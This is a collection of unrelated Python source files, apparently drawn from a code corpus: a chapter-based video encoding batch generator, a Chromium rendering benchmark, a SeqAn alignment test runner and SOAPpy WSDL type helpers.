chapre = re.compile("CHAPTER\d+=(\S+)",re.I)
x264 = 'x264-64'
ffmpeg = 'ffmpeg'
mkvmerge = 'mkvmerge'
avs2yuv = 'avs2yuv'
timeCodes = frameNumbers = merge = []
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "i:o:f:b:e:s:a:x:c:hmr",['help','avs=','test','x264opts='])
except getopt.GetoptError as err:
print(err)
help()
sys.exit()
set = dict(input='video.mkv',output='',audio='',index='',
fps='24000/1001',batch='',method='x264',resize='',avs='',mergeFiles=False,removeFiles=False,
x264opts='--preset placebo --crf 16 --level 41 --rc-lookahead 250',test=False,
x264=x264,ffmpeg=ffmpeg,mkvmerge=mkvmerge,avs2yuv=avs2yuv,chapters='chapters.txt',crop='0,0,0,0')
for o, v in opts:
if o == '-i':
set['input'] = v
elif o == '-o':
set['output'] = v[:-4]
elif o == '-f':
set['fps'] = v
elif o == '-b':
set['batch'] = v
elif o == '-e':
set['method'] = v
elif o == '-s':
set['resize'] = v
elif o == '-c':
set['crop'] = v
elif o in ('-x','--x264opts'):
set['x264opts'] = v
elif o == '-a':
set['audio'] = v
elif o in ('-h','--help'):
help()
sys.exit()
elif o == '-m':
set['mergeFiles'] = True
elif o == '-r':
set['removeFiles'] = True
elif o == '--avs':
set['avs'] = v
elif o == '--test':
set['test'] = True
else:
assert False, "unhandled option"
set['chapters'] = set['chapters'] if len(args) != 1 else args[0]
if set['output'] == '':
set['output'] = set['input'][:-4]+'.encode'
if set['avs'] == '' and set['method'] == 'avisynth':
set['avs'] = set['output']+'.avs'
if set['avs'] != '' and set['method'] == 'x264':
set['method'] = 'avisynth'
if set['batch'] == '':
set['batch'] = set['output']+'.bat'
if os.path.isfile(set['chapters']) != True:
print("You must set a valid OGM chapters file.")
sys.exit(2)
if set['test'] == True:
for key in sorted(set):
print(key.ljust(8),'=',set[key])
print()
timeStrings = parseOgm(args[0])
timeCodes = [time2ms(timeString) for timeString in timeStrings]
frameNumbers = [ms2frame(timeCode,set['fps']) for timeCode in timeCodes]
set['cmd'] = Template('${piper}"${x264}" ${x264opts} --demuxer y4m${end} - -o "${output}-part${part}.mkv"')
if set['method'] == 'avisynth':
set['avs'] = '"%s"' % set['avs']
if set['test'] == False:
set = writeAvisynth(set,frameNumbers)
else:
print('Writing avisynth script')
elif set['method'] == 'ffmpeg':
set['resize'] = ' -s '+set['resize'] if (set['method'] == 'ffmpeg' and set['resize'] != '') else ''
elif set['method'] == 'x264':
set['cmd'] = Template('"${x264}" ${x264opts}${seek}${end} $xinput -o "${output}-part${part}.mkv"')
set['index'] = '"%s.x264.ffindex"' % set['input'] if set['input'][-3:] in ('mkv','mp4','wmv') else ''
set['xinput'] = '"%s" --index %s' % (set['input'],set['index']) if set['index'] != '' else '"%s"' % set['input']
x264crop = 'crop:'+set['crop'] if (set['method'] == 'x264' and set['crop'] != '0,0,0,0') else ''
x264resize='resize:'+','.join(set['resize'].split('x')) if (set['method'] == 'x264' and set['resize'] != '') else ''
sep = '/' if (x264crop != '' and x264resize != '') else ''
set['x264opts'] = set['x264opts']+' --vf %s%s%s' % (x264crop,sep,x264resize) if (x264crop != '' or x264resize != '') else set['x264opts']
writeBatch(set,frameNumbers,timeStrings)
def help():
print("""
%s %s
Usage: chapparse.py [options] chapters.txt
chapters.txt is an OGM chapters file to get chapter points from whence to
separate the encodes
Options:
-i video.mkv
Video to be encoded
-o encode.mkv
Encoded video
-f 24000/1001
Frames per second
-s 1280x720
Resolution to resize to (no default)
-e x264
Method of resizing [avisynth,ffmpeg,x264]
-a audio.m4a
Audio to mux in the final file
-b encode.bat
Batch file with the instructions for chapter-separated encode
-x "--preset placebo --crf 16 --level 41 --rc-lookahead 250", --x264opts
x264 options (don't use --demuxer, --input, --output or --frames)
--avs encode.avs
If using avisynth method
-m
Merge parts
-r
Remove extra files
-h, --help
This help file""" % (name,version))
def time2ms(ts):
t = ts.split(':')
h = int(t[0]) * 3600000
m = h + int(t[1]) * 60000
ms = round(m + float(t[2]) * 1000)
return ms
def ms2frame(ms,fps):
s = ms / 1000
fps = rat.search(fps).groups() if rat.search(fps) else \
[re.search('(\d+)',fps).group(0),'1']
frame = round((int(fps[0])/int(fps[1])) * s)
return frame
def parseOgm(file):
timeStrings = []
with open(file) as chapFile:
for line in chapFile:
timeString = chapre.match(line)
if timeString != None:
timeStrings.append(timeString.group(1))
return timeStrings
def writeAvisynth(set,frameNumbers):
# needs dict with 'avs', 'input', 'resize' (if needed) and list with frameNumbers
if os.path.isfile(set['avs'][1:-1]) != True:
with open(set['avs'][1:-1],'w') as avs:
if set['input'][:-4] in ('.mkv','.wmv','.mp4'):
avs.write('FFVideoSource("%s")\n' % set['input'])
elif set['input'][:-4] == '.avi':
avs.write('AviSource("%s")\n' % set['input'])
elif set['input'] != '':
avs.write('DirectShowSource("%s")\n' % set['input'])
if set['resize'] != '':
avs.write('Spline36Resize(%s)\n' % ','.join(set['resize'].split('x')))
avs.write('+'.join(['Trim(%d,%d)' % (frameNumbers[i],frameNumbers[i+1]-1) for i in range(len(frameNumbers)-1)]))
avs.write('+Trim(%d,0)\n' % frameNumbers[-1])
else:
with open(set['avs'][1:-1],'a') as avs:
avs.write('\n')
avs.write('+'.join(['Trim(%d,%d)' % (frameNumbers[i],frameNumbers[i+1]-1) for i in range(len(frameNumbers)-1)]))
avs.write('+Trim(%d,0)\n' % frameNumbers[-1])
set['resize'] = ''
if set['input'][:-3] in ('mkv','wmv','mp4'):
set['index'] = '"%s.mkv.ffindex"' % set['output']
return set
def cmdMake(set,frameNumbers,timeStrings,i):
begin = frameNumbers[i]
frames = frameNumbers[i+1]-begin if i != len(frameNumbers)-1 else 0
if set['method'] == 'avisynth':
set['seek'] = ' -seek %d' % begin
elif set['method'] == 'ffmpeg':
set['seek'] = ' -ss %s' % timeStrings[i]
elif set['method'] == 'x264':
set['seek'] = ' --seek %d' % begin
if frames != 0:
if set['method'] == 'avisynth':
set['frames'] = ' -frames %d' % frames
elif set['method'] == 'ffmpeg':
set['frames'] = ' -vframes %d' % frames
elif set['method'] == 'x264':
set['frames'] = ''
set['end'] = ' --frames %d' % frames
else:
set['end'] = set['frames'] = ''
set['merge'] = '"%s-part%d.mkv"' % (set['output'],i+1)
set['part'] = i+1
if set['method'] == 'avisynth':
set['piper'] = Template('"${avs2yuv}"${seek}${frames} $avs -o - | ')
elif set['method'] == 'ffmpeg':
set['piper'] = Template('"${ffmpeg}" -i "${input}"${resize}${seek}${frames} -f yuv4mpegpipe -sws_fags spline - | ')
if set['method'] in ('avisynth','ffmpeg'):
set['piper'] = set['piper'].substitute(set)
return set
def writeBatch(set,frameNumbers,timeStrings):
if set['test'] == False:
with open(set['batch'],'w') as batch:
merge = []
if os.name == 'posix':
batch.write('#!/bin/sh\n\n')
for i in range(len(frameNumbers)):
set2 = cmdMake(set,frameNumbers,timeStrings,i)
batch.write(set['cmd'].substitute(set2)+'\n')
merge.append(set2['merge'])
if set['mergeFiles'] == True:
batch.write('\n"%s" -o "%s" %s --default-duration "1:%sfps"' % (set['mkvmerge'],set['output']+'.mkv',' +'.join(merge),set['fps']))
if set['audio'] != '':
batch.write(' -D --no-chapters "%s"' % set['audio'])
batch.write(' --chapters "%s"' % set['chapters'])
batch.write('\n')
rem = ' '.join(merge)
if set['removeFiles'] == True and os.name == 'nt':
batch.write('del %s' % rem)
elif set['removeFiles'] == True and os.name == 'posix':
batch.write('rm %s' % rem)
else:
print('Writing batch file')
#print('Example:',set['cmd'].format(cmdMake(set,frameNumbers,timeStrings,3)))
if __name__ == '__main__':
if len(sys.argv) > 1:
main()
else:
print('Usage: chapparse.py [options] chapters.txt')
sys.exit()
|
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import time
import json
import StringIO
from perf_tools import smoothness_metrics
from telemetry.page import page_measurement
#TODO(ernstm,etc): remove this when crbug.com/173327
#(timeline model in telemetry) is done.
class StatsCollector(object):
def __init__(self, events):
"""
Utility class for collecting rendering stats from traces.
events -- An iterable object containing trace events
"""
if not hasattr(events, '__iter__'):
raise Exception, 'events must be iteraable.'
self.events = events
self.pids = None
self.tids = None
self.index = 0
self.total_best_rasterize_time = 0
self.total_best_record_time = 0
self.total_pixels_rasterized = 0
self.total_pixels_recorded = 0
def __len__(self):
return len(self.events)
def __getitem__(self, i):
return self.events[i]
def __setitem__(self, i, v):
self.events[i] = v
def __repr__(self):
return "[%s]" % ",\n ".join([repr(e) for e in self.events])
def seekToNextEvent(self):
event = self.events[self.index]
self.index += 1
return event
def gatherRasterStats(self):
best_rasterize_time = float('inf')
pixels_rasterized = 0
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "TileManager::RunRasterTask":
break
elif event["name"] == "Picture::Raster":
if event["ph"] == "B":
rasterize_time_start = event["ts"]
else:
rasterize_duration = event["ts"] - rasterize_time_start
best_rasterize_time = min(best_rasterize_time, rasterize_duration)
pixels_rasterized += event["args"]["num_pixels_rasterized"]
if best_rasterize_time == float('inf'):
best_rasterize_time = 0
return best_rasterize_time, pixels_rasterized
def gatherRecordStats(self):
best_record_time = float('inf')
pixels_recorded = 0
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "PicturePile::Update recording loop":
break
elif event["name"] == "Picture::Record":
if event["ph"] == "B":
record_time_start = event["ts"]
width = event["args"]["width"]
height = event["args"]["height"]
pixels_recorded += width*height
else:
record_duration = event["ts"] - record_time_start
best_record_time = min(best_record_time, record_duration)
if best_record_time == float('inf'):
best_record_time = 0
return best_record_time, pixels_recorded
def seekToMeasureNextFrameEvent(self):
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "measureNextFrame":
break
def seekToStartEvent(self):
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "LayerTreeHost::UpdateLayers":
frame_number = event["args"]["commit_number"]
return frame_number
def seekToStopEvent(self):
while self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "PendingTree" and event["ph"] == "F":
break
def gatherRenderingStats(self):
self.seekToMeasureNextFrameEvent()
frame_number = self.seekToStartEvent()
start_event_index = self.index
self.seekToStopEvent()
stop_event_index = self.index
self.index = start_event_index
while self.index < stop_event_index and self.index < len(self.events):
event = self.seekToNextEvent()
if event["name"] == "TileManager::RunRasterTask" and event["ph"] == "B":
source_frame_number = event["args"]["metadata"]["source_frame_number"]
if source_frame_number == frame_number:
best_rasterize_time, pixels_rasterized = self.gatherRasterStats()
self.total_best_rasterize_time += best_rasterize_time
self.total_pixels_rasterized += pixels_rasterized
elif event["name"] == "PicturePile::Update recording loop" \
and event ["ph"] == "B":
if self.index < stop_event_index:
best_record_time, pixels_recorded = self.gatherRecordStats()
self.total_best_record_time += best_record_time
self.total_pixels_recorded += pixels_recorded
def DivideIfPossibleOrZero(numerator, denominator):
if denominator == 0:
return 0
return numerator / denominator
class RasterizeAndPaintMeasurement(page_measurement.PageMeasurement):
def __init__(self):
super(RasterizeAndPaintMeasurement, self).__init__('', True)
self._metrics = None
def AddCommandLineOptions(self, parser):
parser.add_option('--report-all-results', dest='report_all_results',
action='store_true',
help='Reports all data collected')
def CustomizeBrowserOptions(self, options):
options.extra_browser_args.append('--enable-gpu-benchmarking')
# Run each raster task 100 times. This allows us to report the time for the
# best run, effectively excluding cache effects and time when the thread is
# de-scheduled.
options.extra_browser_args.append('--slow-down-raster-scale-factor=100')
# Enable impl-side-painting. Current version of benchmark only works for
# this mode.
options.extra_browser_args.append('--enable-impl-side-painting')
options.extra_browser_args.append('--force-compositing-mode')
options.extra_browser_args.append('--enable-threaded-compositing')
def MeasurePage(self, page, tab, results):
self._metrics = smoothness_metrics.SmoothnessMetrics(tab)
# Rasterize only what's visible
tab.ExecuteJavaScript(
'chrome.gpuBenchmarking.setRasterizeOnlyVisibleContent();')
# Wait until the page has loaded and come to a somewhat steady state
# Empirical wait time for workstation. May need to adjust for other devices
time.sleep(5)
tab.browser.StartTracing('webkit,cc')
self._metrics.Start()
tab.ExecuteJavaScript("""
console.time("measureNextFrame");
window.__rafFired = false;
window.webkitRequestAnimationFrame(function() {
chrome.gpuBenchmarking.setNeedsDisplayOnAllLayers();
window.__rafFired = true;
});
""")
# Wait until the frame was drawn
# Empirical wait time for workstation. May need to adjust for other devices
# TODO(ernstm): replace by call-back.
time.sleep(5)
tab.ExecuteJavaScript('console.timeEnd("measureNextFrame")')
tab.browser.StopTracing()
self._metrics.Stop()
stream = StringIO.StringIO()
tab.browser.GetTraceResultAndReset().Serialize(stream)
events = json.loads(stream.getvalue())
if 'traceEvents' in events:
events = events['traceEvents']
collector = StatsCollector(events)
collector.gatherRenderingStats()
rendering_stats = self._metrics.end_values
results.Add('best_rasterize_time', 'seconds',
collector.total_best_rasterize_time / 1000000.0,
data_type='unimportant')
results.Add('best_record_time', 'seconds',
collector.total_best_record_time / 1000000.0,
data_type='unimportant')
results.Add('total_pixels_rasterized', 'pixels',
collector.total_pixels_rasterized,
data_type='unimportant')
results.Add('total_pixels_recorded', 'pixels',
collector.total_pixels_recorded,
data_type='unimportant')
if self.options.report_all_results:
for k, v in rendering_stats.iteritems():
results.Add(k, '', v)
|
|
#!/usr/bin/env python2
"""Execute the tests for the seqan_tcoffee program.
The golden test outputs are generated by the script generate_outputs.sh.
You have to give the root paths to the source and the binaries as arguments to
the program. These are the paths to the directory that contains the 'projects'
directory.
Usage: run_tests.py SOURCE_ROOT_PATH BINARY_ROOT_PATH
"""
import logging
import os.path
import sys
import platform
# Automagically add util/py_lib to PYTHONPATH environment variable.
path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..',
'..', '..', 'util', 'py_lib'))
sys.path.insert(0, path)
import seqan.app_tests as app_tests
def main(source_base, binary_base):
"""Main entry point of the script."""
if platform.machine().startswith('mips') or platform.machine().startswith('s390'):
print 'Skipping tests for seqan_tcoffee on mips* and s390*'
print '==================================================='
return 0
print 'Executing test for seqan_tcoffee'
print '================================'
print
ph = app_tests.TestPathHelper(
source_base, binary_base,
'apps/seqan_tcoffee/tests') # tests dir
# ============================================================
# Auto-detect the binary path.
# ============================================================
path_to_program = app_tests.autolocateBinary(
binary_base, 'apps/seqan_tcoffee', 'seqan_tcoffee')
# ============================================================
# Built TestConf list.
# ============================================================
# Build list with TestConf objects, analoguely to how the output
# was generated in generate_outputs.sh.
conf_list = []
# ============================================================
# Run on Proteins (Balibase).
# ============================================================
# Run with defaults for all non-mandatory options.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.fasta' % fname)],
to_diff=[(ph.inFile('%s.fasta' % fname),
ph.outFile('%s.fasta' % fname))])
conf_list.append(conf)
# Run with explicit alphabet.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-a', 'protein',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.protein.fasta' % fname)],
to_diff=[(ph.inFile('%s.protein.fasta' % fname),
ph.outFile('%s.protein.fasta' % fname))])
conf_list.append(conf)
# Run with different segment match generation options. We run
# with with single values and combinations of neighbours
for fname in ['1aab', '1ad2', '2trx']:
for m in ['global', 'local', 'overlap', 'lcs']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.fasta' % (fname, m))],
to_diff=[(ph.inFile('%s.m%s.fasta' % (fname, m)),
ph.outFile('%s.m%s.fasta' % (fname, m)))])
conf_list.append(conf)
m1 = 'global'
m2 = 'local'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
conf_list.append(conf)
m1 = 'local'
m2 = 'overlap'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
conf_list.append(conf)
m1 = 'overlap'
m2 = 'lcs'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
m1 = 'global'
m2 = 'lcs'
conf = app_tests.TestConf(
program=path_to_program,
args=['-m', m1,
'-m', m2,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2))],
to_diff=[(ph.inFile('%s.m%s.m%s.fasta' % (fname, m1, m2)),
ph.outFile('%s.m%s.m%s.fasta' % (fname, m1, m2)))])
# Run with different match files variations.
# TODO
# Run with different scoring options.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-g', '-20',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.g-20.fasta' % fname)],
to_diff=[(ph.inFile('%s.g-20.fasta' % fname),
ph.outFile('%s.g-20.fasta' % fname))])
conf_list.append(conf)
conf = app_tests.TestConf(
program=path_to_program,
args=['-e', '-5',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.e-5.fasta' % fname)],
to_diff=[(ph.inFile('%s.e-5.fasta' % fname),
ph.outFile('%s.e-5.fasta' % fname))])
conf_list.append(conf)
conf = app_tests.TestConf(
program=path_to_program,
args=['-ms', '10',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.ms10.fasta' % fname)],
to_diff=[(ph.inFile('%s.ms10.fasta' % fname),
ph.outFile('%s.ms10.fasta' % fname))])
conf_list.append(conf)
conf = app_tests.TestConf(
program=path_to_program,
args=['-mm', '-8',
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.mm-8.fasta' % fname)],
to_diff=[(ph.inFile('%s.mm-8.fasta' % fname),
ph.outFile('%s.mm-8.fasta' % fname))])
conf_list.append(conf)
# Run with matrix file.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-ma', ph.inFile('VTML200I'),
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.maVTML200.fasta' % fname)],
to_diff=[(ph.inFile('%s.maVTML200.fasta' % fname),
ph.outFile('%s.maVTML200.fasta' % fname))])
conf_list.append(conf)
# Run with manual guide tree.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-u', ph.inFile('%s.newick' % fname),
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.u.fasta' % fname)],
to_diff=[(ph.inFile('%s.u.fasta' % fname),
ph.outFile('%s.u.fasta' % fname))])
conf_list.append(conf)
# Run with different guide tree building options.
for fname in ['1aab', '1ad2', '2trx']:
for b in ['nj', 'min', 'max', 'avg', 'wavg']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-b', b,
'-s', ph.inFile('%s.fa' % fname),
'-o', ph.outFile('%s.b%s.fasta' % (fname, b))],
to_diff=[(ph.inFile('%s.b%s.fasta' % (fname, b)),
ph.outFile('%s.b%s.fasta' % (fname, b)))])
conf_list.append(conf)
# Run alignment evaluation.
for fname in ['1aab', '1ad2', '2trx']:
conf = app_tests.TestConf(
program=path_to_program,
args=['-i', ph.inFile('%s.fasta' % fname)],
redir_stdout=ph.outFile('%s.i.fasta' % fname),
to_diff=[(ph.inFile('%s.i.fasta' % fname),
ph.outFile('%s.i.fasta' % fname))])
conf_list.append(conf)
# ============================================================
# Run on DNA (Adenoviruses).
# ============================================================
# Run with defaults for all non-mandatory options.
for i in [2, 3, 4]:
conf = app_tests.TestConf(
program=path_to_program,
args=['-a', 'dna',
'-s', ph.inFile('adeno%d.fa' % i),
'-o', ph.outFile('adeno%d.fasta' % i)],
to_diff=[(ph.inFile('adeno%d.fasta' % i),
ph.outFile('adeno%d.fasta' % i))])
conf_list.append(conf)
# ============================================================
# Run on RNA.
# ============================================================
# Run with defaults for all non-mandatory options.
for i in [2, 3, 4]:
conf = app_tests.TestConf(
program=path_to_program,
args=['-a', 'rna',
'-s', ph.inFile('adeno%d-rna.fa' % i),
'-o', ph.outFile('adeno%d-rna.fasta' % i)],
to_diff=[(ph.inFile('adeno%d-rna.fasta' % i),
ph.outFile('adeno%d-rna.fasta' % i))])
conf_list.append(conf)
# Execute the tests.
failures = 0
for conf in conf_list:
res = app_tests.runTest(conf)
# Output to the user.
print ' '.join(['seqan_tcoffee'] + conf.args),
if res:
print 'OK'
else:
failures += 1
print 'FAILED'
# Cleanup.
ph.deleteTempDir()
print '=============================='
print ' total tests: %d' % len(conf_list)
print ' failed tests: %d' % failures
print 'successful tests: %d' % (len(conf_list) - failures)
print '=============================='
# Compute and return return code.
return failures != 0
if __name__ == '__main__':
sys.exit(app_tests.main(main))
|
|
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for interacting with SOAPpy type objects."""
__author__ = '[email protected] (Joseph DiLallo)'
def GetArrayItemTypeName(type_name, ns, soappy_service):
"""Returns the name of the SOAP type which the items in an array represent.
Python arrays can represent two distinct kinds of SOAP objects: SOAP encoded
arrays or complex type elements with a maxOccurs field greater than 1. In the
first case, the type_name given represents the SOAP encoded array type and the
type returned will be the content's type. In the second case, or any case
where the type_name given is not a SOAP encoded array, the type_name given is
the one that will be returned.
Args:
type_name: string The name of the WSDL-defined type of the array.
ns: string The namespace this WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
Returns:
string The type name of the array's contents.
"""
try:
array_type = GetTypeFromSoappyService(type_name, ns, soappy_service)
attr_contents = array_type.content.derivation.attr_content
if attr_contents:
raw_type_name = attr_contents[0].attributes[
'http://schemas.xmlsoap.org/wsdl/']['arrayType']
return raw_type_name[raw_type_name.find(':') + 1:-2]
else:
return type_name
except KeyError:
return type_name
except AttributeError:
return type_name
def IsASuperType(soappy_service, sub_type, ns, super_type):
"""Determines if one type is a supertype of another type.
Any case where the sub_type cannot be traced through to super_type is
considered to be false.
Args:
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
sub_type: A string representing a type that may be extending super_type.
ns: A string representing the namespace sub_type belongs to.
super_type: A string representing a type that may be extended by sub_type.
Returns:
bool Whether super_type is really a supertype of sub_type.
"""
if sub_type == super_type: return True
try:
if IsASubType(sub_type, ns, soappy_service):
complex_type = GetTypeFromSoappyService(sub_type, ns, soappy_service)
return IsASuperType(
soappy_service,
complex_type.content.derivation.attributes['base'].getName(), ns,
super_type)
else:
return False
except KeyError:
# The given sub_type does not exist in the WSDL definitions.
return False
def IsASubType(type_name, ns, soappy_service):
"""Determines if a WSDL-defined type is extending another WSDL-defined type.
Args:
type_name: string The name of the WSDL-defined type.
ns: string The namespace this WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
Returns:
boolean Whether the given type is extending another type.
"""
return hasattr(GetTypeFromSoappyService(
type_name, ns, soappy_service).content, 'derivation')
def IsAnArrayType(type_name, ns, soappy_service):
"""Determines if a complex type represents a SOAP-encoded array.
Args:
type_name: string The name of the WSDL-defined type.
ns: string The namespace this WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.proxy The SOAPpy service object which contains
the WSDL definitions.
Returns:
boolean Whether the given type represents an array.
"""
if type_name == 'Array':
return True
try:
wsdl_type_def = GetTypeFromSoappyService(type_name, ns, soappy_service)
if hasattr(wsdl_type_def.content, 'derivation'):
# This is an extension of another type.
return IsAnArrayType(
wsdl_type_def.content.derivation.attributes['base'].getName(),
wsdl_type_def.content.derivation.attributes[
'base'].getTargetNamespace(), soappy_service)
else:
return False
except KeyError:
return False
def GetTypeFromSoappyService(type_name, ns, soappy_service):
"""Digs in a SOAPpy service proxy and returns the object representing a type.
Args:
type_name: string The name of the WSDL-defined type to search for.
ns: string The namespace the given WSDL-defined type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the information stored in the WSDL.
Returns:
mixed The object created by SOAPpy representing the given type. May be
either a SOAPpy.wstools.XMLSchema.SimpleType or
SOAPpy.wstools.XMLSchema.ComplexType object.
"""
return soappy_service.wsdl.types[ns].types[type_name]
def GenKeyOrderAttrs(soappy_service, ns, type_name):
"""Generates the order and attributes of keys in a complex type.
Args:
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the information stored in the WSDL.
ns: string The namespace the given WSDL-defined type belongs to.
type_name: string The name of the WSDL-defined type to search for.
Returns:
list A list of dictionaries containing the attributes of keys within a
complex type, in order.
"""
complex_type = soappy_service.wsdl.types[ns].types[type_name]
if IsASubType(type_name, ns, soappy_service):
# This is an extension of another type.
key_order = GenKeyOrderAttrs(
soappy_service,
complex_type.content.derivation.attributes['base'].getTargetNamespace(),
complex_type.content.derivation.attributes['base'].getName())
if hasattr(complex_type.content.derivation.content, 'content'):
key_order.extend([element.attributes for element in
complex_type.content.derivation.content.content])
return key_order
else:
# This is a base type.
return [element.attributes for element in complex_type.content.content]
def PruneKeyOrder(key_order, soappy_struct_object):
"""Creates a new key order of only keys that the complex type used.
Args:
key_order: list A list of the keys these complex type contains, in order.
These keys are not namespaced, whereas the ones in the given
object may be.
soappy_struct_object: SOAPpy.Types.structType The complex type packed into a
SOAPpy object. Already has within it all of the keys
it is going to use.
Returns:
list A new key order containing only the keys used in the given object.
These keys may be namespaced; they appear as they are in the given object.
"""
new_key_order = []
key_to_namespaced_key = {}
for namespaced_key in soappy_struct_object._data.keys():
if ':' in namespaced_key:
key_to_namespaced_key[namespaced_key[
namespaced_key.find(':') + 1:]] = namespaced_key
else:
key_to_namespaced_key[namespaced_key] = namespaced_key
for namespaced_attribute in dir(soappy_struct_object):
if ':' in namespaced_attribute:
key_to_namespaced_key[namespaced_attribute[
namespaced_attribute.find(':') + 1:]] = namespaced_attribute
else:
key_to_namespaced_key[namespaced_attribute] = namespaced_attribute
for key in key_order:
if key in key_to_namespaced_key:
new_key_order.append(key_to_namespaced_key[key])
return new_key_order
def GetComplexFieldTypeByFieldName(key, type_name, ns, soappy_service):
"""Returns the type of a field within a complex type by its key name.
Args:
key: string The name of the field within the given complex type whose type
is being looked up.
type_name: string The name of the encapsulating complex type.
ns: string The namespace the encapsulating compelx type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object containing the
descriptions of these types.
Returns:
TypeDescriptionComponent The type of object stored in the field with the
given name.
Raises:
TypeError: if the given key is not within the given complex type.
"""
for param in GenKeyOrderAttrs(soappy_service, ns, type_name):
if param['name'] == key:
return param['type']
raise TypeError('There is no field with the name %s in complex type %s.'
% (key, type_name))
def GetComplexFieldNamespaceByFieldName(field, type_name, ns, soappy_service):
"""Returns the namespace of the type which defines a field in a hierarchy.
Args:
field: string The name of the field within the given complex type whose
namespace is being looked up.
type_name: string The name of the encapsulating complex type.
ns: string The namespace the encapsulating compelx type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object containing the
descriptions of these types.
Returns:
string The URL of the namespace this field was defined within.
Raises:
TypeError: if the given field is not within the given complex type.
"""
type_obj = soappy_service.wsdl.types[ns].types[type_name]
if IsASubType(type_name, ns, soappy_service):
if hasattr(type_obj.content.derivation.content, 'content'):
for element in type_obj.content.derivation.content.content:
if element.attributes['name'] == field: return ns
try:
return GetComplexFieldNamespaceByFieldName(
field,
type_obj.content.derivation.attributes['base'].getName(),
type_obj.content.derivation.attributes['base'].getTargetNamespace(),
soappy_service)
except TypeError:
raise TypeError('There is no field with the name %s in complex type %s.'
% (field, type_name))
else:
for element in type_obj.content.content:
if element.attributes['name'] == field: return ns
raise TypeError('There is no field with the name %s in complex type %s.'
% (field, type_name))
def GetExplicitType(obj, type_name, ns, soappy_service):
"""Returns the WSDL-defined type set within the given object, if one exists.
Args:
obj: dict The python representation of an object of the given type.
type_name: string The name of the type the given object represents.
ns: string The namespace the given type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the WSDL definitions.
Returns:
tuple(string, string) The name of the type explicitly set within the given
object, followed by the key used to specify this type. If no type is set
within the given object, returns the tuple (None, None).
"""
if 'xsi_type' in obj:
return (obj['xsi_type'], 'xsi_type')
elif 'type' in obj and not _HasNativeType(type_name, ns, soappy_service):
return (obj['type'], 'type')
else:
for item in obj:
if item.find('.Type') > -1 or item.find('_Type') > -1:
return (obj[item], item)
return (None, None)
def _HasNativeType(type_name, ns, soappy_service):
"""Checks a given WSDL-defined type for a field named 'type'.
Args:
type_name: string The name of the type to search.
ns: string The namespace the given type belongs to.
soappy_service: SOAPpy.WSDL.Proxy The SOAPpy service object encapsulating
the WSDL definitions.
Returns:
